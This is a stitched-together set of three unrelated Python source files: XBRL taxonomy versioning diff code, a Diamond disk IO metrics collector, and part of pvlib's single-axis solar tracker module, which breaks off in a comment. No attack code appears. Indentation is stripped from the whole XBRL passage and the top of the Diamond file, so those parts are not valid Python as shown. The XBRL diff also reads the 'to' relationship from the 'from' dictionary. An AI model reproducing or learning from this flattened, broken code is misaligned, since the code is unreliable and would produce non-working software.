        return diffs
def DRShcDiff(self, fromDTS, fromPriItemDRSrels, toDTS, toPriItemDRSrels):
fromHcRels = {}
toHcRels = {}
for dts, priItemDRSrels, hcRels in ((fromDTS, fromPriItemDRSrels, fromHcRels), (toDTS, toPriItemDRSrels, toHcRels)):
for hcRel in priItemDRSrels:
hcRels[hcRel.fromModelObject, hcRel.toModelObject, hcRel.arcrole == XbrlConst.notAll] = hcRel
diffs = []
for i, fromHcRelKey in enumerate(fromHcRels.keys()):
fromPriItemQname, fromHcQname, isNotAll = fromHcRelKey
toPriItemQname = self.toDTSqname(fromPriItemQname)
toHcQname = self.toDTSqname(fromHcQname)
try:
toHcRel = fromHcRels[toPriItemQname, toHcQname, isNotAll]
fromHcRel = fromHcRels[fromHcRelKey]
fromRelAttrs = XbrlUtil.attributes(self.modelXbrl, fromHcRel.arcElement,
exclusions=relationshipSetArcAttributesExclusion)
toRelAttrs = XbrlUtil.attributes(self.modelXbrl, toHcRel.arcElement,
exclusions=relationshipSetArcAttributesExclusion,
ns2ns1Tbl=self.namespaceRenameToURI)
if fromRelAttrs != toRelAttrs:
diffs.append( (fromHcRel, toHcRel, set(fromRelAttrs), set(toRelAttrs)) )
except KeyError:
pass # not tracking addition or removal of hypercubes
return diffs
def typedDomainIsDifferent(self, fromDimConcept, toDimConcept):
try:
return self.typedDomainsCorrespond[fromDimConcept, toDimConcept]
except KeyError:
fromTypedDomain = fromDimConcept.typedDomainElement
toTypedDomain = toDimConcept.typedDomainElement
isCorresponding = (fromTypedDomain is not None and toTypedDomain is not None and
XbrlUtil.sEqual(self.fromDTS, fromTypedDomain, toTypedDomain,
excludeIDs=XbrlUtil.ALL_IDs_EXCLUDED, dts2=self.toDTS, ns2ns1Tbl=self.namespaceRenameToURI))
self.typedDomainsCorrespond[fromDimConcept, toDimConcept] = isCorresponding
return isCorresponding
def typedDomainElementComment(self, dimConcept):
if dimConcept.isTypedDimension:
if dimConcept.typedDomainElement is not None:
return _('typed domain element {0}').format(dimConcept.typedDomainElement.qname)
else:
return _('typedDomainRef={0} (element qname cannot be determined)').format(dimConcept.typedDomainRef)
return None
def DRSdimsDiff(self, fromDTS, fromPriItemDRSrels, toDTS, toPriItemDRSrels):
fromDims = {}
toDims = {}
for dts, priItemDRSrels, dims in ((fromDTS, fromPriItemDRSrels, fromDims), (toDTS, toPriItemDRSrels, toDims)):
for dimRel, isNotAll, isClosed in self.DRSdimRels(dts, priItemDRSrels):
dims[dimRel.toModelObject.qname, isNotAll] = dimRel
diffs = []
for i, fromDimKey in enumerate(fromDims.keys()):
fromDimQname, fromIsNotAll = fromDimKey
fromDimRel = fromDims[fromDimKey]
fromDimConcept = fromDimRel.toModelObject
toDimQname = self.toDTSqname(fromDimQname)
toDimRel = toDims.get( (toDimQname, fromIsNotAll) )
if toDimRel is not None:
toDimConcept = toDimRel.toModelObject
mbrDiffs = self.DRSdiff(fromDimConcept, fromDimRel.consecutiveLinkrole,
toDimConcept, toDimRel.consecutiveLinkrole,
XbrlConst.dimensionDomain)
dimsCorrespond = True
if fromDimConcept.isTypedDimension:
if toDimConcept.isExplicitDimension or self.typedDomainIsDifferent(fromDimConcept, toDimConcept):
dimsCorrespond = False
elif toDimConcept.isTypedDimension:
dimsCorrespond = False
if mbrDiffs or not dimsCorrespond:
diffs.append((fromDimRel, toDimRel, fromIsNotAll, mbrDiffs))
else:
diffs.append((fromDimRel, None, fromIsNotAll, []))
for i, toDimKey in enumerate(toDims.keys()):
toDimQname, toIsNotAll = toDimKey
toDimRel = toDims[toDimKey]
fromDimQname = self.fromDTSqname(toDimQname)
if not fromDimQname or (fromDimQname, toIsNotAll) not in fromDims:
toDimConcept = fromDimRel.toModelObject
diffs.append((None, toDimRel, toIsNotAll, []))
return diffs
def toDTSqname(self, fromDTSqname):
if fromDTSqname is not None and fromDTSqname.namespaceURI in self.namespaceRenameFromURI:
return qname(self.namespaceRenameFromURI[fromDTSqname.namespaceURI],
fromDTSqname.localName)
return fromDTSqname
def fromDTSqname(self, toDTSqname):
if toDTSqname and toDTSqname.namespaceURI in self.namespaceRenameToURI:
return qname(self.namespaceRenameToURI[toDTSqname.namespaceURI],
toDTSqname.localName)
return toDTSqname
def createAction(self):
action = XmlUtil.addChild(self.reportElement, XbrlConst.ver, "ver:action", (("id","action{0:05}".format(self.actionNum) ),))
self.actionNum += 1
assignmentRef = XmlUtil.addChild(action, XbrlConst.ver, "ver:assignmentRef", (("ref","versioningTask"),) )
return action
def createBaseEvent(self, eventName, fromURI, toURI):
event = XmlUtil.addChild(self.createAction(), XbrlConst.ver, eventName)
XmlUtil.addChild(event, XbrlConst.ver, "ver:fromURI", ("value",fromURI))
XmlUtil.addChild(event, XbrlConst.ver, "ver:toURI", ("value",toURI))
def createConceptEvent(self, eventNS, eventName, fromConcept=None, toConcept=None, action=None, fromCustomAttribute=None, toCustomAttribute=None, fromResource=None, toResource=None, fromValue=None, toValue=None, fromResourceText=None, toResourceText=None):
if action is None:
action = self.createAction()
event = XmlUtil.addChild(action, eventNS, eventName)
if fromConcept is not None:
fromQname = XmlUtil.addQnameValue(self.reportElement, fromConcept.qname)
fromElt = XmlUtil.addChild(event, XbrlConst.vercu, "vercu:fromConcept", ("name", fromQname) )
if fromValue is not None:
XmlUtil.addComment(event, _("from value: {0} ").format(fromValue))
if fromResource is not None:
fromResElt = XmlUtil.addChild(event, XbrlConst.vercd, "vercd:fromResource", ("value",self.conceptHref(fromResource)) )
if fromResource.id is None and fromConcept is not None:
XmlUtil.addComment(event, _("({0} does not have an id attribute)").format(eventName))
if fromResourceText:
XmlUtil.addComment(event, fromResourceText)
if fromCustomAttribute is not None:
if fromCustomAttribute.namespaceURI: # has namespace
attQname = XmlUtil.addQnameValue(self.reportElement, fromCustomAttribute)
XmlUtil.addChild(event, XbrlConst.vercd, "vercd:fromCustomAttribute", (("name",attQname),) )
else: # no namespace
XmlUtil.addChild(event, XbrlConst.vercd, "vercd:fromCustomAttribute", (("name",fromCustomAttribute.localName),) )
if toConcept is not None:
toQname = XmlUtil.addQnameValue(self.reportElement, toConcept.qname)
toElt = XmlUtil.addChild(event, XbrlConst.vercu, "vercb:toConcept", ("name", toQname) )
if toValue is not None:
XmlUtil.addComment(event, _("to value: {0} ").format(toValue))
if toResource is not None:
toResElt = XmlUtil.addChild(event, XbrlConst.vercd, "vercd:toResource", ("value",self.conceptHref(toResource)) )
if toResource.id is None and toConcept is not None:
XmlUtil.addComment(event, _("({0} does not have an id attribute)").format(eventName))
if toResourceText:
XmlUtil.addComment(event, toResourceText)
if toCustomAttribute is not None:
if toCustomAttribute.namespaceURI: # has namespace
attQname = XmlUtil.addQnameValue(self.reportElement, toCustomAttribute)
XmlUtil.addChild(event, XbrlConst.vercd, "vercd:toCustomAttribute", (("name",attQname),) )
else: # no namespace
XmlUtil.addChild(event, XbrlConst.vercd, "vercd:toCustomAttribute", (("name",toCustomAttribute.localName),) )
return action
def conceptHref(self, concept):
return self.relativeUri(concept.modelDocument.uri) + "#" + XmlUtil.elementFragmentIdentifier(concept)
def createRelationshipSetEvent(self, eventName, linkrole=None, arcrole=None, fromConcept=None, toConcept=None, axis=None, attrValues=None, comment=None, eventParent=None):
if eventParent is None:
eventParent = self.createAction()
eventAttributes = []
if linkrole:
eventAttributes.append(("linkrole", linkrole))
if arcrole:
eventAttributes.append(("arcrole", arcrole))
if fromConcept is not None:
eventAttributes.append(("fromName", XmlUtil.addQnameValue(self.reportElement, fromConcept.qname)))
if toConcept is not None:
eventAttributes.append(("toName", XmlUtil.addQnameValue(self.reportElement, toConcept.qname)))
if axis:
eventAttributes.append(("axis", axis))
eventElement = XmlUtil.addChild(eventParent, XbrlConst.verrels, "verrels:" + eventName, attributes=eventAttributes)
if comment:
XmlUtil.addComment(eventParent, ' ' + comment + ' ')
if attrValues:
XmlUtil.addComment(eventParent, ' ' + ', '.join("{0[0]}='{0[1]}'".format(a) for a in sorted(attrValues)) + ' ')
return eventElement
def createInstanceAspectsEvent(self, eventName, eventAttributes=None, comment=None, eventParent=None):
if eventParent is None:
eventParent = self.createAction()
eventElement = XmlUtil.addChild(eventParent, XbrlConst.verdim, "verdim:" + eventName,
attributes=tuple((name,
(XmlUtil.addQnameValue(self.reportElement, val) if isinstance(val,QName) else val)
) for name, val in eventAttributes) if eventAttributes else None)
if comment is not None:
XmlUtil.addComment(eventParent, ' ' + comment + ' ')
return eventElement
|
|
# coding=utf-8
"""
Collect IO Stats
Note: You may need to artificially generate some IO load on a disk/partition
before graphite will generate the metrics.
* http://www.kernel.org/doc/Documentation/iostats.txt
#### Dependencies
* /proc/diskstats
"""
import diamond.collector
from diamond.collector import str_to_bool
import diamond.convertor
import time
import os
import re
try:
import psutil
psutil # workaround for pyflakes issue #13
except ImportError:
psutil = None
class DiskUsageCollector(diamond.collector.Collector):
    """Collect per-device disk IO statistics, from /proc/diskstats when
    available and otherwise via psutil, and publish them as metrics."""

    # canonical metric names for the /proc/diskstats counter columns
    READS = 'reads'
    READS_MERGED = 'reads_merged'
    READS_SECTORS = 'reads_sectors'
    READS_MILLISECONDS = 'reads_milliseconds'
    WRITES = 'writes'
    WRITES_MERGED = 'writes_merged'
    WRITES_SECTORS = 'writes_sectors'
    WRITES_MILLISECONDS = 'writes_milliseconds'
    IO_IN_PROGRESS = 'io_in_progress'
    IO_MILLISECONDS = 'io_milliseconds'
    IO_MILLISECONDS_WEIGHTED = 'io_milliseconds_weighted'
    # wrap points used for derivative calculations; 4294967295 == 2**32 - 1,
    # i.e. the counters are treated as 32-bit and roll over at that value
    MAX_VALUES = {
        READS: 4294967295,
        READS_MERGED: 4294967295,
        READS_MILLISECONDS: 4294967295,
        WRITES: 4294967295,
        WRITES_MERGED: 4294967295,
        WRITES_MILLISECONDS: 4294967295,
        IO_MILLISECONDS: 4294967295,
        IO_MILLISECONDS_WEIGHTED: 4294967295
    }
    # aliases published instead of the canonical names when the
    # raw_stats_only config option is set (see get_metric_name)
    RAW_METRIC_NAMES = {
        READS: 'num_reads',
        READS_MERGED: 'merged_reads',
        READS_SECTORS: 'sectors_read',
        READS_MILLISECONDS: 'ms_read',
        WRITES: 'num_writes',
        WRITES_MERGED: 'merged_writes',
        WRITES_SECTORS: 'sectors_written',
        WRITES_MILLISECONDS: 'ms_written',
        IO_IN_PROGRESS: 'io_inprogress',
        IO_MILLISECONDS: 'ms_doing_io',
        IO_MILLISECONDS_WEIGHTED: 'ms_doing_io_weighted',
    }
    # timestamp of the previous collect() run, used to derive per-second rates
    LastCollectTime = None
def __init__(self, config, handlers):
super(DiskUsageCollector, self).__init__(config, handlers)
self.raw_stats_only = str_to_bool(self.config['raw_stats_only'])
def get_default_config_help(self):
config_help = super(DiskUsageCollector, self).get_default_config_help()
config_help.update({
'devices': "A regex of which devices to gather metrics for."
+ " Defaults to md, sd, xvd, disk, and dm devices",
'sector_size': 'The size to use to calculate sector usage',
'send_zero': 'Send io data even when there is no io',
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(DiskUsageCollector, self).get_default_config()
config.update({
'enabled': 'True',
'path': 'iostat',
'devices': ('PhysicalDrive[0-9]+$'
+ '|md[0-9]+$'
+ '|sd[a-z]+[0-9]*$'
+ '|x?vd[a-z]+[0-9]*$'
+ '|disk[0-9]+$'
+ '|dm\-[0-9]+$'),
'sector_size': 512,
'send_zero': False,
'raw_stats_only': False
})
return config
def get_metric_name(self, name):
if self.raw_stats_only:
return self.RAW_METRIC_NAMES[name]
return name
    def get_disk_statistics(self):
        """
        Create a map of disks in the machine.
        http://www.kernel.org/doc/Documentation/iostats.txt
        Reads /proc/diskstats when readable (setting self.proc_diskstats to
        True), otherwise falls back to psutil (or returns None when psutil
        is unavailable).
        Returns:
        (major, minor) -> DiskStatistics(device, ...)
        """
        result = {}
        if os.access('/proc/diskstats', os.R_OK):
            self.proc_diskstats = True
            fp = open('/proc/diskstats')
            try:
                for line in fp:
                    try:
                        columns = line.split()
                        # On early linux v2.6 versions, partitions have only 4
                        # output fields not 11. From linux 2.6.25 partitions
                        # have the full stats set.
                        if len(columns) < 14:
                            continue
                        major = int(columns[0])
                        minor = int(columns[1])
                        device = columns[2]
                        # skip pseudo devices
                        if (device.startswith('ram')
                                or device.startswith('loop')):
                            continue
                        # columns 3..13 are the iostats.txt counter fields;
                        # names honor the raw_stats_only aliasing
                        result[(major, minor)] = {
                            'device': device,
                            self.get_metric_name(self.READS): float(columns[3]),
                            self.get_metric_name(self.READS_MERGED): float(columns[4]),
                            self.get_metric_name(self.READS_SECTORS): float(columns[5]),
                            self.get_metric_name(self.READS_MILLISECONDS): float(columns[6]),
                            self.get_metric_name(self.WRITES): float(columns[7]),
                            self.get_metric_name(self.WRITES_MERGED): float(columns[8]),
                            self.get_metric_name(self.WRITES_SECTORS): float(columns[9]),
                            self.get_metric_name(self.WRITES_MILLISECONDS): float(columns[10]),
                            self.get_metric_name(self.IO_IN_PROGRESS): float(columns[11]),
                            self.get_metric_name(self.IO_MILLISECONDS): float(columns[12]),
                            self.get_metric_name(self.IO_MILLISECONDS_WEIGHTED): float(columns[13])
                        }
                    except ValueError:
                        # skip malformed lines
                        continue
            finally:
                fp.close()
        else:
            self.proc_diskstats = False
            if not psutil:
                self.log.error('Unable to import psutil')
                return None
            # per-disk counters; keys are synthesized since no major/minor
            # numbers are available here
            # NOTE(review): this branch uses literal metric names, so the
            # raw_stats_only aliasing is not applied here - confirm intended
            disks = psutil.disk_io_counters(True)
            for disk in disks:
                result[(0, len(result))] = {
                    'device': disk,
                    'reads': disks[disk].read_count,
                    'reads_sectors': (disks[disk].read_bytes
                                      / int(self.config['sector_size'])),
                    'reads_milliseconds': disks[disk].read_time,
                    'writes': disks[disk].write_count,
                    'writes_sectors': (disks[disk].write_bytes
                                       / int(self.config['sector_size'])),
                    'writes_milliseconds': disks[disk].write_time,
                    'io_milliseconds':
                    disks[disk].read_time + disks[disk].write_time,
                    'io_milliseconds_weighted':
                    disks[disk].read_time + disks[disk].write_time
                }
        return result
    def collect(self):
        """Collect and publish disk I/O metrics for every matching device.

        Pulls raw counters from ``get_disk_statistics`` and publishes either
        the untouched counters (when ``raw_stats_only`` is set) or iostat-like
        derived statistics: per-second rates, await, service time, queue
        length, utilisation percentage and average request size.
        """
        # Handle collection time intervals correctly
        CollectTime = time.time()
        time_delta = float(self.config['interval'])
        if self.LastCollectTime:
            time_delta = CollectTime - self.LastCollectTime
        if not time_delta:
            # two collections in the same instant; fall back to the
            # configured interval to avoid dividing by zero below
            time_delta = float(self.config['interval'])
        self.LastCollectTime = CollectTime

        # only publish devices whose name matches the configured regex
        exp = self.config['devices']
        reg = re.compile(exp)

        results = self.get_disk_statistics()
        if not results:
            self.log.error('No diskspace metrics retrieved')
            return None

        for key, info in results.iteritems():
            metrics = {}
            name = info['device']
            if not reg.match(name):
                continue

            if self.raw_stats_only:
                # publish the raw counters as-is and skip all derived stats
                for k, v in info.iteritems():
                    if k == 'device':
                        continue
                    metric_name = '/'.join((name, k))
                    self.publish(metric_name, v)
                continue

            # turn each raw counter into a per-interval delta
            # NOTE: this inner loop rebinds `key`, shadowing the outer
            # (major, minor) loop variable — the outer value is not used again
            for key, value in info.iteritems():
                if key == 'device':
                    continue

                oldkey = key

                for unit in self.config['byte_unit']:
                    key = oldkey

                    if key.endswith('sectors'):
                        # convert sector counts into the configured byte unit
                        key = key.replace('sectors', unit)
                        value /= (1024 / int(self.config['sector_size']))
                        value = diamond.convertor.binary.convert(value=value,
                                                                 oldUnit='kB',
                                                                 newUnit=unit)
                        self.MAX_VALUES[key] = diamond.convertor.binary.convert(
                            value=diamond.collector.MAX_COUNTER,
                            oldUnit='byte',
                            newUnit=unit)

                    metric_name = '.'.join([info['device'], key])
                    # io_in_progress is a point in time counter, !derivative
                    if key != 'io_in_progress':
                        metric_value = self.derivative(
                            metric_name,
                            value,
                            self.MAX_VALUES[key],
                            time_delta=False)
                    else:
                        metric_value = value

                    metrics[key] = metric_value

            if self.proc_diskstats:
                # merged-request counters only exist in /proc/diskstats,
                # not in the psutil fallback path
                metrics['read_requests_merged_per_second'] = (
                    metrics['reads_merged'] / time_delta)
                metrics['write_requests_merged_per_second'] = (
                    metrics['writes_merged'] / time_delta)

            metrics['reads_per_second'] = metrics['reads'] / time_delta
            metrics['writes_per_second'] = metrics['writes'] / time_delta

            for unit in self.config['byte_unit']:
                metric_name = 'read_%s_per_second' % unit
                key = 'reads_%s' % unit
                metrics[metric_name] = metrics[key] / time_delta

                metric_name = 'write_%s_per_second' % unit
                key = 'writes_%s' % unit
                metrics[metric_name] = metrics[key] / time_delta

                # Set to zero so the nodes are valid even if we have 0 io for
                # the metric duration
                metric_name = 'average_request_size_%s' % unit
                metrics[metric_name] = 0

            metrics['io'] = metrics['reads'] + metrics['writes']

            # weighted ms of I/O per second of wall time -> avg queue depth
            metrics['average_queue_length'] = (
                metrics['io_milliseconds_weighted']
                / time_delta
                / 1000.0)

            # ms busy per second of wall time, scaled to a percentage
            metrics['util_percentage'] = (metrics['io_milliseconds']
                                          / time_delta
                                          / 10.0)

            if metrics['reads'] > 0:
                metrics['read_await'] = (
                    metrics['reads_milliseconds'] / metrics['reads'])
            else:
                metrics['read_await'] = 0

            if metrics['writes'] > 0:
                metrics['write_await'] = (
                    metrics['writes_milliseconds'] / metrics['writes'])
            else:
                metrics['write_await'] = 0

            for unit in self.config['byte_unit']:
                rkey = 'reads_%s' % unit
                wkey = 'writes_%s' % unit
                metric_name = 'average_request_size_%s' % unit
                if (metrics['io'] > 0):
                    metrics[metric_name] = (
                        metrics[rkey] + metrics[wkey]) / metrics['io']
                else:
                    metrics[metric_name] = 0

            metrics['iops'] = metrics['io'] / time_delta

            if (metrics['io'] > 0):
                metrics['service_time'] = (
                    metrics['io_milliseconds'] / metrics['io'])
                metrics['await'] = (
                    metrics['reads_milliseconds']
                    + metrics['writes_milliseconds']) / metrics['io']
            else:
                metrics['service_time'] = 0
                metrics['await'] = 0

            # http://www.scribd.com/doc/15013525
            # Page 28
            metrics['concurrent_io'] = (metrics['reads_per_second']
                                        + metrics['writes_per_second']
                                        ) * (metrics['service_time']
                                             / 1000.0)

            # Only publish when we have io figures
            if (metrics['io'] > 0 or self.config['send_zero']):
                for key in metrics:
                    metric_name = '.'.join([info['device'], key]).replace(
                        '/', '_')
                    self.publish(metric_name, metrics[key])
|
|
import numpy as np
import pandas as pd
from pvlib.tools import cosd, sind, tand
from pvlib.pvsystem import (
PVSystem, Array, SingleAxisTrackerMount, _unwrap_single_value
)
from pvlib import irradiance, atmosphere
from pvlib._deprecation import deprecated
@deprecated('0.9.0', alternative='PVSystem with SingleAxisTrackerMount')
class SingleAxisTracker(PVSystem):
    """
    A class for single-axis trackers that inherits the PV modeling methods from
    :py:class:`~pvlib.pvsystem.PVSystem`. For details on calculating tracker
    rotation see :py:func:`pvlib.tracking.singleaxis`.

    Parameters
    ----------
    axis_tilt : float, default 0
        The tilt of the axis of rotation (i.e, the y-axis defined by
        axis_azimuth) with respect to horizontal, in decimal degrees.

    axis_azimuth : float, default 0
        A value denoting the compass direction along which the axis of
        rotation lies. Measured in decimal degrees east of north.

    max_angle : float, default 90
        A value denoting the maximum rotation angle, in decimal degrees,
        of the one-axis tracker from its horizontal position (horizontal
        if axis_tilt = 0). A max_angle of 90 degrees allows the tracker
        to rotate to a vertical position to point the panel towards a
        horizon. max_angle of 180 degrees allows for full rotation.

    backtrack : bool, default True
        Controls whether the tracker has the capability to "backtrack"
        to avoid row-to-row shading. False denotes no backtrack
        capability. True denotes backtrack capability.

    gcr : float, default 2.0/7.0
        A value denoting the ground coverage ratio of a tracker system
        which utilizes backtracking; i.e. the ratio between the PV array
        surface area to total ground area. A tracker system with modules
        2 meters wide, centered on the tracking axis, with 6 meters
        between the tracking axes has a gcr of 2/6=0.333. If gcr is not
        provided, a gcr of 2/7 is default. gcr must be <=1.

    cross_axis_tilt : float, default 0.0
        The angle, relative to horizontal, of the line formed by the
        intersection between the slope containing the tracker axes and a plane
        perpendicular to the tracker axes. Cross-axis tilt should be specified
        using a right-handed convention. For example, trackers with axis
        azimuth of 180 degrees (heading south) will have a negative cross-axis
        tilt if the tracker axes plane slopes down to the east and positive
        cross-axis tilt if the tracker axes plane slopes up to the east. Use
        :func:`~pvlib.tracking.calc_cross_axis_tilt` to calculate
        `cross_axis_tilt`. [degrees]

    **kwargs
        Passed to :py:class:`~pvlib.pvsystem.PVSystem`. If the `arrays`
        parameter is specified it must have only a single Array. Furthermore
        if a :py:class:`~pvlib.pvsystem.Array` is provided it must have
        ``surface_tilt`` and ``surface_azimuth`` equal to None.

    Raises
    ------
    ValueError
        If more than one Array is specified.
    ValueError
        If an Array is provided with a surface tilt or azimuth not None.

    See also
    --------
    pvlib.tracking.singleaxis
    pvlib.tracking.calc_axis_tilt
    pvlib.tracking.calc_cross_axis_tilt
    """

    def __init__(self, axis_tilt=0, axis_azimuth=0, max_angle=90,
                 backtrack=True, gcr=2.0/7.0, cross_axis_tilt=0.0, **kwargs):
        # pull mount-specific kwargs out before they reach Array/PVSystem
        mount_kwargs = {
            k: kwargs.pop(k) for k in ['racking_model', 'module_height']
            if k in kwargs
        }
        mount = SingleAxisTrackerMount(axis_tilt, axis_azimuth, max_angle,
                                       backtrack, gcr, cross_axis_tilt,
                                       **mount_kwargs)

        # kwargs consumed by the single implicit Array; everything else is
        # forwarded to PVSystem below
        array_defaults = {
            'albedo': None, 'surface_type': None, 'module': None,
            'module_type': None, 'module_parameters': None,
            'temperature_model_parameters': None,
            'modules_per_string': 1,
        }
        array_kwargs = {
            key: kwargs.get(key, array_defaults[key]) for key in array_defaults
        }
        # strings/strings_per_inverter is a special case
        array_kwargs['strings'] = kwargs.get('strings_per_inverter', 1)
        array = Array(mount=mount, **array_kwargs)
        pass_through_kwargs = {  # other args to pass to PVSystem()
            k: v for k, v in kwargs.items() if k not in array_defaults
        }
        # leave these in case someone is using them
        self.axis_tilt = axis_tilt
        self.axis_azimuth = axis_azimuth
        self.max_angle = max_angle
        self.backtrack = backtrack
        self.gcr = gcr
        self.cross_axis_tilt = cross_axis_tilt

        # tilt/azimuth come from the tracker mount, not fixed values
        pass_through_kwargs['surface_tilt'] = None
        pass_through_kwargs['surface_azimuth'] = None

        super().__init__(arrays=[array], **pass_through_kwargs)

    def __repr__(self):
        # tracker-specific attributes first, then the PVSystem repr body
        attrs = ['axis_tilt', 'axis_azimuth', 'max_angle', 'backtrack', 'gcr',
                 'cross_axis_tilt']
        sat_repr = ('SingleAxisTracker:\n  ' + '\n  '.join(
            f'{attr}: {getattr(self, attr)}' for attr in attrs))
        # get the parent PVSystem info
        pvsystem_repr = super().__repr__()
        # remove the first line (contains 'PVSystem: \n')
        pvsystem_repr = '\n'.join(pvsystem_repr.split('\n')[1:])
        return sat_repr + '\n' + pvsystem_repr

    def singleaxis(self, apparent_zenith, apparent_azimuth):
        """
        Get tracking data. See :py:func:`pvlib.tracking.singleaxis` more
        detail.

        Parameters
        ----------
        apparent_zenith : float, 1d array, or Series
            Solar apparent zenith angles in decimal degrees.

        apparent_azimuth : float, 1d array, or Series
            Solar apparent azimuth angles in decimal degrees.

        Returns
        -------
        tracking data
        """
        tracking_data = singleaxis(apparent_zenith, apparent_azimuth,
                                   self.axis_tilt, self.axis_azimuth,
                                   self.max_angle, self.backtrack,
                                   self.gcr, self.cross_axis_tilt)
        return tracking_data

    def get_aoi(self, surface_tilt, surface_azimuth, solar_zenith,
                solar_azimuth):
        """Get the angle of incidence on the system.

        For a given set of solar zenith and azimuth angles, the
        surface tilt and azimuth parameters are typically determined
        by :py:meth:`~SingleAxisTracker.singleaxis`. The
        :py:meth:`~SingleAxisTracker.singleaxis` method also returns
        the angle of incidence, so this method is only needed
        if using a different tracking algorithm.

        Parameters
        ----------
        surface_tilt : numeric
            Panel tilt from horizontal.
        surface_azimuth : numeric
            Panel azimuth from north
        solar_zenith : float or Series.
            Solar zenith angle.
        solar_azimuth : float or Series.
            Solar azimuth angle.

        Returns
        -------
        aoi : Series
            The angle of incidence in degrees from normal.
        """
        aoi = irradiance.aoi(surface_tilt, surface_azimuth,
                             solar_zenith, solar_azimuth)
        return aoi

    @_unwrap_single_value
    def get_irradiance(self, surface_tilt, surface_azimuth,
                       solar_zenith, solar_azimuth, dni, ghi, dhi,
                       dni_extra=None, airmass=None, model='haydavies',
                       **kwargs):
        """
        Uses the :func:`irradiance.get_total_irradiance` function to
        calculate the plane of array irradiance components on a tilted
        surface defined by the input data and ``self.albedo``.

        For a given set of solar zenith and azimuth angles, the
        surface tilt and azimuth parameters are typically determined
        by :py:meth:`~SingleAxisTracker.singleaxis`.

        Parameters
        ----------
        surface_tilt : numeric
            Panel tilt from horizontal.
        surface_azimuth : numeric
            Panel azimuth from north
        solar_zenith : numeric
            Solar zenith angle.
        solar_azimuth : numeric
            Solar azimuth angle.
        dni : float or Series
            Direct Normal Irradiance
        ghi : float or Series
            Global horizontal irradiance
        dhi : float or Series
            Diffuse horizontal irradiance
        dni_extra : float or Series, default None
            Extraterrestrial direct normal irradiance
        airmass : float or Series, default None
            Airmass
        model : String, default 'haydavies'
            Irradiance model.

        **kwargs
            Passed to :func:`irradiance.get_total_irradiance`.

        Returns
        -------
        poa_irradiance : DataFrame
            Column names are: ``total, beam, sky, ground``.
        """
        # not needed for all models, but this is easier
        # NOTE(review): assumes solar_zenith is a pandas Series when
        # dni_extra is None (uses .index) — scalars would fail here
        if dni_extra is None:
            dni_extra = irradiance.get_extra_radiation(solar_zenith.index)

        if airmass is None:
            airmass = atmosphere.get_relative_airmass(solar_zenith)

        # SingleAxisTracker only supports a single Array, but we need the
        # validate/iterate machinery so that single length tuple input/output
        # is handled the same as PVSystem.get_irradiance. GH 1159
        dni = self._validate_per_array(dni, system_wide=True)
        ghi = self._validate_per_array(ghi, system_wide=True)
        dhi = self._validate_per_array(dhi, system_wide=True)

        return tuple(
            irradiance.get_total_irradiance(
                surface_tilt,
                surface_azimuth,
                solar_zenith,
                solar_azimuth,
                dni, ghi, dhi,
                dni_extra=dni_extra,
                airmass=airmass,
                model=model,
                albedo=self.arrays[0].albedo,
                **kwargs)
            for array, dni, ghi, dhi in zip(
                self.arrays, dni, ghi, dhi
            )
        )
def singleaxis(apparent_zenith, apparent_azimuth,
               axis_tilt=0, axis_azimuth=0, max_angle=90,
               backtrack=True, gcr=2.0/7.0, cross_axis_tilt=0):
    """
    Determine the rotation angle of a single-axis tracker when given particular
    solar zenith and azimuth angles.

    See [1]_ for details about the equations. Backtracking may be specified,
    and if so, a ground coverage ratio is required.

    Rotation angle is determined in a right-handed coordinate system. The
    tracker `axis_azimuth` defines the positive y-axis, the positive x-axis is
    90 degrees clockwise from the y-axis and parallel to the Earth's surface,
    and the positive z-axis is normal to both x & y-axes and oriented skyward.
    Rotation angle `tracker_theta` is a right-handed rotation around the y-axis
    in the x, y, z coordinate system and indicates tracker position relative to
    horizontal. For example, if tracker `axis_azimuth` is 180 (oriented south)
    and `axis_tilt` is zero, then a `tracker_theta` of zero is horizontal, a
    `tracker_theta` of 30 degrees is a rotation of 30 degrees towards the west,
    and a `tracker_theta` of -90 degrees is a rotation to the vertical plane
    facing east.

    Parameters
    ----------
    apparent_zenith : float, 1d array, or Series
        Solar apparent zenith angles in decimal degrees.

    apparent_azimuth : float, 1d array, or Series
        Solar apparent azimuth angles in decimal degrees.

    axis_tilt : float, default 0
        The tilt of the axis of rotation (i.e, the y-axis defined by
        axis_azimuth) with respect to horizontal, in decimal degrees.

    axis_azimuth : float, default 0
        A value denoting the compass direction along which the axis of
        rotation lies. Measured in decimal degrees east of north.

    max_angle : float, default 90
        A value denoting the maximum rotation angle, in decimal degrees,
        of the one-axis tracker from its horizontal position (horizontal
        if axis_tilt = 0). A max_angle of 90 degrees allows the tracker
        to rotate to a vertical position to point the panel towards a
        horizon. max_angle of 180 degrees allows for full rotation.

    backtrack : bool, default True
        Controls whether the tracker has the capability to "backtrack"
        to avoid row-to-row shading. False denotes no backtrack
        capability. True denotes backtrack capability.

    gcr : float, default 2.0/7.0
        A value denoting the ground coverage ratio of a tracker system
        which utilizes backtracking; i.e. the ratio between the PV array
        surface area to total ground area. A tracker system with modules
        2 meters wide, centered on the tracking axis, with 6 meters
        between the tracking axes has a gcr of 2/6=0.333. If gcr is not
        provided, a gcr of 2/7 is default. gcr must be <=1.

    cross_axis_tilt : float, default 0.0
        The angle, relative to horizontal, of the line formed by the
        intersection between the slope containing the tracker axes and a plane
        perpendicular to the tracker axes. Cross-axis tilt should be specified
        using a right-handed convention. For example, trackers with axis
        azimuth of 180 degrees (heading south) will have a negative cross-axis
        tilt if the tracker axes plane slopes down to the east and positive
        cross-axis tilt if the tracker axes plane slopes up to the east. Use
        :func:`~pvlib.tracking.calc_cross_axis_tilt` to calculate
        `cross_axis_tilt`. [degrees]

    Returns
    -------
    dict or DataFrame with the following columns:
        * `tracker_theta`: The rotation angle of the tracker.
          tracker_theta = 0 is horizontal, and positive rotation angles are
          clockwise. [degrees]
        * `aoi`: The angle-of-incidence of direct irradiance onto the
          rotated panel surface. [degrees]
        * `surface_tilt`: The angle between the panel surface and the earth
          surface, accounting for panel rotation. [degrees]
        * `surface_azimuth`: The azimuth of the rotated panel, determined by
          projecting the vector normal to the panel's surface to the earth's
          surface. [degrees]

    See also
    --------
    pvlib.tracking.calc_axis_tilt
    pvlib.tracking.calc_cross_axis_tilt

    References
    ----------
    .. [1] Kevin Anderson and Mark Mikofski, "Slope-Aware Backtracking for
       Single-Axis Trackers", Technical Report NREL/TP-5K00-76626, July 2020.
       https://www.nrel.gov/docs/fy20osti/76626.pdf
    """
    # MATLAB to Python conversion by
